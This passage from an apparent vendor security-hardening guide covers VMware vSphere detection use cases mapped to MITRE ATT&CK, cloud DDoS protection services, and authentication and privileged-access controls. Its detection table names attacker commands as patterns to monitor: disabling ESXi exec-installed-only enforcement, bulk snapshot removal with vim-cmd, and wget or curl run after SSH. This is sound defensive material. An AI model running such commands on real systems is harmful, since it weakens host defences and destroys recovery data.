100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Unauthorized Access Attempt to Virtualized Infrastructure</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for attempted logins to virtualized infrastructure by unauthorized accounts.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Unauthorized SSH Connection Attempt</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1021/004/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1021.004 – Remote Services: SSH</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for instances where an SSH connection is attempted when SSH has not been enabled for an approved purpose or is not expected from a specific origination asset.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ESXi Shell/SSH Enablement</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1059/004/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1059.004 - Command and Scripting Interpreter</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor ESXi hostd.log and shell.log for the SSH service being enabled via DCUI, vSphere client, or API calls. Alert on any ESXi SSH enablement event that was not preceded by an approved change request.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Bulk VM Power-Off Events</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1529/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1529 - System Shutdown/Reboot</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Detect sequences where multiple VMs are powered off within a short time window (e.g., &gt;5 VMs in 10 minutes) via vCenter events. </span></p> <p><span style="vertical-align: baseline;">Correlate with vpxd.log "ReceivedPowerOffVM" events.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">VMDK File Access from Non-Standard Processes</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1486/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1486 - Data Encrypted for Impact</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for processes accessing .vmdk, .vmx, .vmsd, or .vmsn files outside of normal VMware service processes (hostd, vpxd, fdm). </span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">execInstalledOnly Disablement</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1562/001/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1562.001 - Impair Defenses: Disable or Modify Tools</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor ESXi shell.log for execution of "esxcli system settings encryption set" with "--require-exec-installed-only=F" or "--require-secure-boot=F". Alert on any cryptographic enforcement disablement event that was not preceded by an approved change request.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">vCenter SSO Identity Modification</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1556/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1556 - Modify Authentication Process</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor vCenter events and vpxd.log for modifications to SSO identity sources, including the addition of new LDAP providers or changes to vshphere.local administrator group membership. Alert on an identity source change not initiated from a designated PAW subnet.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">VM Disk Detach and Reattach to Non-Inventory VM</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1486/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1486 - Data Encrypted for Impact</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Detect sequences where a virtual disk is removed from a Tier-0 asset via "vim.event.VmReconfiguredEvent" and subsequently attached to an orphaned or non-standard inventory VM. </span></p> <p><span style="vertical-align: baseline;">Correlate with "vim.event.VmRegisteredEvent" events on non-standard datastore paths within the same time window.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">VCSA Shell Command Anomaly</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1059/004/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1059.004 - Command and Scripting Interpreter: Unix Shell</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor VCSA shell audit logs for execution of high-risk commands (e.g., wget, curl, psql, certificate-manager) by any user following an interactive SSH session. Alert on any instance where these commands are executed outside of an approved change window.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Bulk Snapshot Deletion</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1490/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1490 - Inhibit System Recovery</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Detects sequences where snapshots are removed across multiple VMs within a short time window via vCenter events. Correlate with "vim-cmd vmsvc/snapshot.removeall" execution in hostd.log to confirm host-level action.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 7: Detection opportunities for VMware vSphere </span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Protecting Against DDoS Attacks</span></h4> <p><span style="vertical-align: baseline;">A distributed denial-of-service (DDoS) attack is an example of a disruptive attack that could impact the availability of cloud-based resources and services. Modernized DDoS protection must extend beyond the legacy concepts of filtering and rate-limiting, and include cloud-native capabilities that can scale to combat adversarial capabilities.</span></p> <p><span style="vertical-align: baseline;">In addition to third-party DDoS and web application access protection services, the following table provides an overview of DDoS protection capabilities within common cloud-based infrastructures.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Cloud Provider</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">DDoS Protection Capability </strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Google Cloud</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://cloud.google.com/security/products/armor"><span style="text-decoration: underline; vertical-align: baseline;">Google Cloud Armor</span></a></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Amazon Web Services</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://aws.amazon.com/shield/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">AWS Shield</span></a></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Microsoft Azure</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://azure.microsoft.com/en-us/products/ddos-protection" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Azure DDoS Protection</span></a></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cloud Platform Agnostic </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://www.imperva.com/products/web-application-firewall-waf/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Imperva WAF</span></a></p> <p><a href="https://www.akamai.com/glossary/what-is-a-waf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Akamai WAF</span></a></p> <p><a href="https://www.cloudflare.com/ddos/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Cloudflare DDoS Protection</span></a></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 8: Common cloud capabilities to mitigate DDoS attacks</span></p> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Hardening the Cloud Perimeter </span></h4> <p><span style="vertical-align: baseline;">With the hybrid operating model of modern day infrastructure, cloud consoles and SaaS platforms are high-value targets for credential harvesting and data exfiltration. Minimizing these risks requires a dual-defense strategy: robust identity controls to prevent unauthorized access, and platform-specific guardrails to protect access to resources, data, and to minimize the attack surface. </span></p> <h5><span style="vertical-align: baseline;">Strong Authentication Enforcement</span></h5> <p><span style="vertical-align: baseline;">Strong authentication is the foundational requirement for cloud resilience and securing cloud infrastructure. Similar to on-premises environments, a compromise of a privileged credential, token, or session could lead to unintended consequences that result in a high-impact event for an organization. To mitigate these pervasive risks, organizations must unconditionally enforce strong authentication for all external-facing cloud services, administrative portals, and SaaS platforms. </span></p> <p><span style="vertical-align: baseline;">Organizations should enforce the usage of phishing-resistant authenticators such as FIDO2 (WebAuthn) hardware tokens or passkeys, or certificate based authentication for accounts assigned privileged roles and functions. For non-privileged users, authenticator software (Microsoft Authenticator or Okta Verify) should be configured to utilize device-bound factors such as Windows Hello for Business or TouchID.</span></p> <p><span style="vertical-align: baseline;">Additionally, organizations should leverage the concept of authenticators (identity + device attestation) as part of the authentication transaction. This includes enforcing a validated-device access policy that restricts privileged access to only originate from managed, compliant, and healthy devices. Trusted network zones should be defined in order to restrict access to cloud resources from the open internet. Untrusted network zones should be defined to restrict authentication from anonymizing services such as VPNs or TOR. Using device-bound session credentials where possible mitigates the risk of session token theft.</span></p> <h5><span style="vertical-align: baseline;">Identity and Device Segmentation for Privileged Actions</span></h5> <p><span style="vertical-align: baseline;">The implementation of privileged access workstations (PAWs) is a critical defense against threat actors attempting to compromise administrative sessions. A PAW is a highly hardened, dedicated hardware endpoint used exclusively for sensitive administrative tasks.</span></p> <p><span style="vertical-align: baseline;">Administrators should leverage a non-privileged account for daily tasks, while privileged actions are restricted to only being permissible from the hardened PAW, or from explicitly defined IP ranges. This "air-gap" between communication and administration prevents an adversary from moving laterally from a compromised non-privileged identity to a privileged context within hybrid environments. </span></p> <h5><span style="vertical-align: baseline;">Just-in-Time Access and the Principle of Least Privilege</span></h5> <p><span style="vertical-align: baseline;">Static, standing privileges present a security risk in hybrid environments. Following a zero-trust cloud architecture, administrative privileges should be entirely ephemeral. Implementing Just-In-Time (JIT) and Just-Enough-Access (JEA) mechanisms ensures that administrators are granted only the specific, granular permissions necessary to perform a discrete task, and only for a highly limited duration, after which the permissions are automatically revoked. This architectural model provides organizations with the ability to enforce approvals for privileged actions, enhanced monitoring, and detailed visibility regarding any privileged actions taken within a specific session.</span></p> <h5><span style="vertical-align: baseline;">Securing Non-Human Identities</span></h5> <p><span style="vertical-align: baseline;">Organizations should implement identity governance practices that include processes to rotate API keys, certificates, service account secrets, tokens, and sessions on a predefined basis. AI agents or identities correlating to autonomous outcomes should be configured with strictly scoped permissions and associated monitoring. Non-privileged users should be restricted from authorizing third-party application integrations or creating API keys without organizational approval.</span></p> <p><span style="vertical-align: baseline;">Continuous scanning should be performed to identify and remediate hard-coded secrets and sensitive credentials across all cloud and SaaS environments.</span></p> <h5><span style="vertical-align: baseline;">Storage Infrastructure Security and Immutable Backups</span></h5> <p><span style="vertical-align: baseline;">The strategic objective of a 